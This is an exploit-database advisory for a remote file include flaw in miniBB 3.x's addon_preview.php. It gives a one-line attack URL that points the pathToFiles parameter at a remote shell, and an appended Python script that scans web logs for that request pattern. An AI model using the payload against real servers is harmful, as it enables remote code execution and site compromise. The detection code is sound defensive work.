miniBB 3.x Addon preview Remote File Include Vulnerability

2013-01-27T00:00:00
ID 1337DAY-ID-20238
Type zdt
Reporter bd0rk
Modified 2013-01-27T00:00:00

Description

Exploit for php platform in category web applications

# Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux

------------------------------------------------------------------------

I found vulnerable code in file addon_preview.php line: 12

So an attacker can use it to compromise the system.

The parameter not declared before the require is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------

Greetings from cold Germany, bd0rk.

==> REST IN PEACE AARON SWARTZ <==

#  0day.today [2018-03-28]  #
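
A defender-side check for the request pattern reported above, as an added example that is not part of the original advisory: it scans web access logs for requests to addon_preview.php that supply pathToFiles in the query string. The log lines are constructed samples, and the rule that legitimate clients never send this parameter is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [27/Jan/2013:10:01:02 +0000] "GET /forum/index.php?action=vthread&forum=1 HTTP/1.1" 200 5120
198.51.100.7 - - [27/Jan/2013:10:01:09 +0000] "GET /forum/addon_preview.php?pathToFiles=http://example.invalid/x.txt HTTP/1.1" 200 312
203.0.113.9 - - [27/Jan/2013:10:02:30 +0000] "GET /forum/addon_preview.php?pathToFiles=hTTp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 298
203.0.113.9 - - [27/Jan/2013:10:03:11 +0000] "POST /forum/addon_preview.php HTTP/1.1" 200 1840
192.0.2.44 - - [27/Jan/2013:10:04:00 +0000] "GET /forum/addon_preview.php?pathToFiles=./ HTTP/1.1" 200 1790
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)  # http://, ftp://, php://, ...
SCRIPT = "addon_preview.php"   # file named in the advisory
PARAM = "pathToFiles"          # parameter named in the advisory


def scan(log_text):
    """Return (client_ip, verdict, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.lower().endswith("/" + SCRIPT):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # Also catch the array form pathToFiles[]=...
            if name.split("[")[0] != PARAM:
                continue
            # parse_qsl decoded once; decode again to catch double encoding.
            value = unquote(value).strip()
            verdict = "remote-include" if SCHEME_RE.match(value) else "path-override"
            findings.append((m["ip"], verdict, value))
    return findings


if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value}")
```

Request bodies are not recorded in access logs, so a pathToFiles value sent by POST would need a WAF or application-level log to be seen.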